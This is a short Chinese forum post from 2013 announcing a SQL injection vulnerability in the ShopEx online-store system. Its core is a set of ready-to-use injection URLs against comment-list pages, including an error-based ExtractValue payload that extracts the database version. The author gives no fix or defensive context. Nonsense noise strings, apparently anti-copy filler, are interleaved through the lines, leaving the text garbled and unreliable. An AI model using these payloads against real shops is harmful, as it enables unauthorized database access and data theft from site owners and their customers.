注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
# }+ N- _0 R- F
! @. k' M% F" S: U" M好吧,我扯远了~~. X+ S/ C5 O$ o# Q9 o/ p
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~ J* H1 `2 l7 ~$ f
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下: ! l! _7 w$ R4 P; s, t; A
! h: C3 S% T( x3 W) b t4 J) [% W
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html # H9 k5 k$ Q) B1 @2 I) G& K6 c# S. b
! d) P1 {# C2 z" B% A8 M/ T
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html + v5 ]$ Z. A$ N. Q3 n* e l
& N5 H: @. ?% C4 vhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html # D- }7 I2 x) M, h( H" v
. W# w. e9 a9 g) G) n5 U. zhttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html ! \# r8 ^/ _8 m* Y7 Y' f/ L& M+ n
7 v8 @# Y: Z9 K+ q+ k" T& Q( d
, m! j6 G* p! g/ w2 m% C& I3 ~一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。% _7 J7 J. T& O* P, w; C
如何注入就不多说了,10多年的东西了…不会也会了…
9 B7 i( ?9 s7 ]1 y! v, ^2 }
6 T. P) b7 {( h: H% I" T
3 X0 |& p& Q4 |- J6 R& }* f6 d: g8 c3 v2 {, |4 j; l' O7 P( j
8 I0 Z# ^% e, `: L8 v |
发表于 2013-2-19 08:31:27
收藏
支持
反对